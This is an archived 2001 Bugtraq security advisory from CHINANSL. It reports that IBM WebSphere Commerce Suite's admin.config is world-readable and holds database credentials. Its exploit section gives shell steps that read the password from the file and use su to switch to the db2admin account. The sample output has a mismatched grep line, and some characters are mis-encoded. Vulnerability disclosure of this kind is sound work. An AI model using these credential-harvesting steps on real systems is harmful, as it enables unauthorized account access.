5911223 2001-01-03 03:38 +0000  /108 rader/ china nsl <webmaster@CHINANSL.COM>
Sänt av: joel@lysator.liu.se
Importerad: 2001-01-03  17:15  av Brevbäraren (som är implementerad i) Python
Extern mottagare: BUGTRAQ@SECURITYFOCUS.COM
Externa svar till: webmaster@CHINANSL.COM
Mottagare: Bugtraq (import) <14580>
Ärende: CHINANSL Security Advisory(CSA200013)
------------------------------------------------------------
From: china nsl <webmaster@CHINANSL.COM>
To: BUGTRAQ@SECURITYFOCUS.COM
Message-ID: <20010103033818.22029.qmail@securityfocus.com>

CHINANSL Security Advisory(CSA200013)

Topic: IBM WCS local user exceed his authority to 
access another file

Release Date£º Dec 25, 2000


Affected system:
============

IBM WCS(Websphere Commerce Suite)
¡¡¡¡+ Sun OS
¡¡¡¡+ Sun Solaris
¡¡¡¡+ Microsoft Windows NT
¡¡¡¡+ Microsoft Windows 2000
¡¡¡¡+ HP HP-UX 
¡¡¡¡+ IBM AIX
¡¡¡¡+ Linux


Impact: 
======

CHINANSL security team has found a security 
problem in IBM WCS. Exploitation
of this vulnerability, It is possible that a malicious local 
user can run 
arbitrary command to get root right.

Description£º
=========

IBM WCS is bussiness suite, after install it. A file 
named admin.config will be
produced, The user name and password to access 
that suite connect database will
be include in this file. and this file access right is -
rwxr-xr-x, So local user
can access it, and run some aibitrary command to 
get root right.

Exploit:
=====

Examples for Sun OS 5.7
$find admin.config |grep admin.config
/opt/WebSphere/AppServer/bin/admin.config
$cd /opt/WebSphere/AppServer/bin/
$grep dbUser admin.config
com.ibm.ejs.sm.adminServer.dbUser=db2admin
$grep dbPassword admin.config
com.ibm.ejs.sm.adminServer.dbUser=ibmdb2
$su - db2admin
password:ibmdb2
$id
uid=db2adminID(db2admin)

Examples for WIN2000:
d:\waserver\bin\>more admin.config
com.ibm.ejs.sm.adminServer.dbUser=ad2admin
com.ibm.ejs.sm.adminServer.dbPassword=ad2admi
n
...

Workaround:
=========

1¡¢Config this product correctly.


Solution:
=======

None

DISCLAIMS:
========
THE INFORMATION PROVIDED IS RELEASED BY 
CHINANSL "AS IS" WITHOUT WARRANTY OF ANY
KIND. CHINANSL DISCLAIMS ALL WARRANTIES, 
EITHER EXPRESS OR IMPLIED, EXCEPT FOR 
THE WARRANTIES OF MERCHANTABILITY. IN NO 
EVENTSHALL CHINANSL BE LIABLE FOR ANY 
DAMAGES WHATSOEVER INCLUDING DIRECT, 
INDIRECT, INCIDENTAL,CONSEQUENTIAL, LOSS 
OF 
BUSINESS PROFITS OR SPECIAL DAMAGES, 
EVEN IF CHINANSL HAS BEEN ADVISED OF THE 
POSSIBILITY OF SUCH DAMAGES. DISTRIBUTION 
OR REPRODUTION OF THE INFORMATION IS 
PROVIDED THAT THE ADVISORY IS NOT 
MODIFIED IN ANY WAY.

?Copyright 2000-2001 CHINANSL. All Rights 
Reserved. Terms of use.


CHINANSL Security Team 
<webmaster@chinansl.com>
CHINANSL INFORMATION TECHNOLOGY CO.,LTD
(http://www.chinansl.com)
(5911223) ------------------------------------------